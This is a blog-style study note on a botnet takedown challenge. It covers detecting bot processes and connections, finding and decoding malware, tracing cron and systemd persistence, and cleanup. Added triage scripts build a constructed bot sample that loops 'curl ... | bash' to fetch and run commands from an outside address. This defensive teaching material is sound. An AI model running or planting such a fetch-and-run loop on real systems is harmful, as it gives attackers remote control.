Botnet Takedown

2025. 3. 22. 12:43·Study Record/Cybersecurity
Table of Contents
  1. Botnet Takedown Challenge
  2. Botnet?
  3. What is a C2 (Command & Control)?
  4. Files and Directories to Investigate
  5. Path
     1) Detect the Bot
     2) Find the Malware File
     3) Analyze the Malware
     4) Check for Obfuscation or Encoding
     5) Trace Persistence
     6) Take It Down

1. Botnet Takedown Challenge

- Investigate the infected machine, identify IOCs (Indicators of Compromise), find the malware or script, determine how it works, and neutralize the botnet connection.

 

2. Botnet?

- A botnet is a network of infected computers (bots) controlled by a central attacker (botmaster).

- These bots may receive commands through a C2 server, IRC servers, web requests, or reverse shells

 

3. What is a C2 (Command & Control)?

- A C2 server is what the malware connects back to: it acts like a headquarters for the bots

 

4. Files and Directories to Investigate

- /tmp/, /var/tmp/, /dev/shm/ : world-writable directories often used by malware to store payloads

- /etc/cron* : persistent scheduled execution

- ~/.bashrc, ~/.profile : startup scripts

- /etc/systemd/system/ : malicious services may be installed

 

5. Path

1) Detect the Bot

(1) ps aux

Lists all running processes on the system as a static snapshot.

- a : show processes for all users, not just you

- u : show user/owner of the process

- x : show processes not attached to a terminal (like background daemons or malware)

(2) top

Shows live, real-time process activity, like Task Manager in terminal form.

Great for spotting malware using lots of CPU or RAM.

top

- q : quit

- k : kill a process (enter PID)

- P : sort by CPU

- M : sort by memory

(3) netstat -tulnp

Shows network connections and listening ports

- t : TCP connections only

- u : UDP connections only

- l : show listening ports (services waiting for connections)

- n : show numeric IPs/ports (instead of resolving names)

- p : show the PID/program name using the port

sudo netstat -tulnp

(4) ss -tulnp

A faster, modern alternative to netstat that takes the same -tulnp flags

(5) sudo lsof -i

LiSt Open Files, limited to the ones that are network-related

- i : internet-related files. It shows any process that is connected to an IP address, is listening on a port, or is using TCP or UDP

sudo lsof -i

 

- Look for weird external IPs, strange ports like 1337, 6667, 8080, etc.
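As an added example (not code from the original post), the script below applies the "external IPs / strange ports" check to `ss -tunp` output (no -l, so it lists established connections rather than listeners). The suspicious-port list, the private-range check (IPv4 only) and the sample ss lines are constructed assumptions.

```shell
#!/bin/sh
# Added example (not code from the original post): flag peers in `ss -tunp`
# output (no -l, so established connections, not listeners, are shown).
# The port list, private-range check and sample lines are constructed.

SUSPICIOUS_PORTS="1337 6667 8080"   # ports the post calls out as commonly abused

# RFC 1918 and loopback IPv4 ranges (assumption: IPv4-only triage).
is_private_ip() {
  case "$1" in
    10.*|127.*|192.168.*|172.1[6-9].*|172.2[0-9].*|172.3[01].*) return 0 ;;
  esac
  return 1
}

is_suspicious_port() {
  for p in $SUSPICIOUS_PORTS; do
    [ "$1" = "$p" ] && return 0
  done
  return 1
}

# Reads `ss -tunp` lines on stdin and prints "<pid> <peer> <reasons>" for each
# connection to a non-private peer or to a listed port. The PID comes from the
# users:(("name",pid=N,fd=M)) column, so `ls -l /proc/<pid>/exe` then shows
# where the binary actually lives (e.g. /tmp or /dev/shm).
flag_connections() {
  while read -r netid state rq sq laddr peer proc; do
    [ "$netid" = "Netid" ] && continue          # skip the header line
    ip=${peer%:*}; port=${peer##*:}
    pid=$(printf '%s' "$proc" | sed -n 's/.*pid=\([0-9]*\).*/\1/p')
    reasons=""
    is_private_ip "$ip" || reasons="external-peer"
    if is_suspicious_port "$port"; then reasons="${reasons:+$reasons,}suspicious-port"; fi
    if [ -n "$reasons" ]; then printf '%s %s %s\n' "${pid:-?}" "$peer" "$reasons"; fi
  done
}

# Constructed ss output: an IRC-port beacon, an SSH session to a LAN host,
# a local DB connection and an HTTPS fetch to an outside address.
SAMPLE_SS='Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp ESTAB 0 0 192.168.1.20:49152 203.0.113.10:6667 users:(("bot",pid=4242,fd=3))
tcp ESTAB 0 0 192.168.1.20:49153 192.168.1.5:22 users:(("ssh",pid=1001,fd=3))
tcp ESTAB 0 0 127.0.0.1:34000 127.0.0.1:5432 users:(("psql",pid=77,fd=8))
tcp ESTAB 0 0 192.168.1.20:49154 198.51.100.7:443 users:(("curl",pid=5150,fd=5))'

# Runs the triage over the sample; on a live host: ss -tunp | flag_connections
triage_sample() { printf '%s\n' "$SAMPLE_SS" | flag_connections; }
triage_sample
```

An external peer on 443 is not proof of anything by itself; the point of the list is to know which PIDs to inspect first.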

 

2) Find the Malware File

ls -lah /tmp /var/tmp /dev/shm

- a : show hidden files

- h : human-readable sizes

(1) Find hidden files (.*) anywhere on the system

find / -type f -iname ".*" 2>/dev/null

(2) Find recent files modified in the last 60 minutes

find / -type f -mmin -60 2>/dev/null

 

- you can use this to catch recently dropped payloads

(3) Use file to see whether it's a script or an ELF binary

- ELF : Executable and Linkable Format, the standard binary format for Linux executables

- If an unknown file turns out to be an ELF, it is likely a compiled executable (possibly malicious)

 

Python script -> readable and easy to analyze

ELF 64-bit executable -> compiled malware (harder; needs strings, Ghidra, etc.)

3) Analyze the Malware

- If it's a script:

cat suspicious.sh

 

- If it's an ELF binary:

strings suspicious_elf | less

 

Check if it contains:

- C2 IP or domain

- commands like curl, wget, rm, chmod, etc.

- Python or bash code that loops or connects outward

 

4) Check for Obfuscation or Encoding

If you see something like:

exec(base64.b64decode("aW1wb3J0IG9zCg=="))

it's obfuscated: the real code is hidden inside the Base64 string.

 

(1) Decode Base64 in the terminal

echo "aW1wb3J0IG9zCg==" | base64 -d

Here that prints import os, so the hidden payload is Python code.
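The following added example (not code from the original post) covers the "script or ELF?", "Analyze the Malware" and "Check for Obfuscation" steps in one script: it tells a script from an ELF by its magic bytes, pulls IPs, URLs and download verbs out of a script or `strings` output, and unwraps nested exec(base64.b64decode(...)) layers. It needs only coreutils, so it works where `file` and `strings` are not installed; the sample files it creates are constructed.

```shell
#!/bin/sh
# Added example (not code from the original post): a small triage helper for
# the "script or ELF?", "what does it reach out to?" and "is it base64-wrapped?"
# steps. It relies only on coreutils, so it works where `file` and `strings`
# are missing. Sample files are constructed below for illustration.

# Classify by magic bytes: an ELF binary starts with 7f 45 4c 46 ("\x7fELF").
file_kind() {
  magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
  if [ "$magic" = "7f454c46" ]; then echo elf; else echo other; fi
}

# Pull out the indicators the post says to look for in a script or in
# `strings` output: IPv4 addresses (with optional port), http(s) URLs and
# the download/cleanup verbs curl, wget, chmod, rm. Output is de-duplicated.
iocs() {
  grep -Ewo '([0-9]{1,3}\.){3}[0-9]{1,3}(:[0-9]+)?|https?://[^ "'"'"']+|curl|wget|chmod|rm' "$1" | sort -u
}

# Peel nested exec(base64.b64decode("...")) layers until no blob is left and
# print the innermost code (one layer per loop iteration).
unwrap_b64() {
  code=$(cat "$1")
  while printf '%s' "$code" | grep -q 'b64decode("'; do
    blob=$(printf '%s' "$code" | sed -n 's/.*b64decode("\([A-Za-z0-9+/=]*\)").*/\1/p' | head -n 1)
    code=$(printf '%s' "$blob" | base64 -d)
  done
  printf '%s\n' "$code"
}

# Build constructed samples in a temp dir and print its path:
#   bot.sh     - a beaconing loop of the kind the post describes
#   sample.elf - only the ELF magic, enough to exercise file_kind
#   loader.py  - the post's base64 one-liner, wrapped in a second layer
make_samples() {
  d=$(mktemp -d)
  printf '#!/bin/bash\nwhile true; do\n  curl -s http://203.0.113.10:8080/cmd | bash\n  sleep 60\ndone\n' > "$d/bot.sh"
  printf '\177ELF\002\001\001' > "$d/sample.elf"
  inner='exec(base64.b64decode("aW1wb3J0IG9zCg=="))'
  printf 'exec(base64.b64decode("%s"))\n' "$(printf '%s' "$inner" | base64 | tr -d '\n')" > "$d/loader.py"
  echo "$d"
}

d=$(make_samples)
for f in "$d"/*; do printf '%s: %s\n' "$f" "$(file_kind "$f")"; done
iocs "$d/bot.sh"
unwrap_b64 "$d/loader.py"     # prints: import os
```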

 

5) Trace Persistence

(1) check crontab

crontab -l
cat /etc/crontab
ls -l /etc/cron.*/*

- l : Lists the cron jobs for the current user

(2) Check systemd services

systemctl list-units --type=service | grep suspicious

(3) Look at user .bashrc or .profile

- .bashrc : A hidden config file in a user's home directory. It runs every time you open a terminal.

cat ~/.bashrc

 

6) Take It Down

Once you have found the malware and know how it connects:

(1) Kill the process

sudo kill -9 <pid>

(2) Delete the file

sudo rm -f /tmp/bot.sh

(3) Remove the persistence

- r : deletes all cron jobs for the current user (with sudo, that is root's crontab; use crontab -u <user> -r for another account)

sudo crontab -r

- If that crontab also holds legitimate jobs, open it with crontab -e and delete only the malicious line instead

 

Sungyeon Kim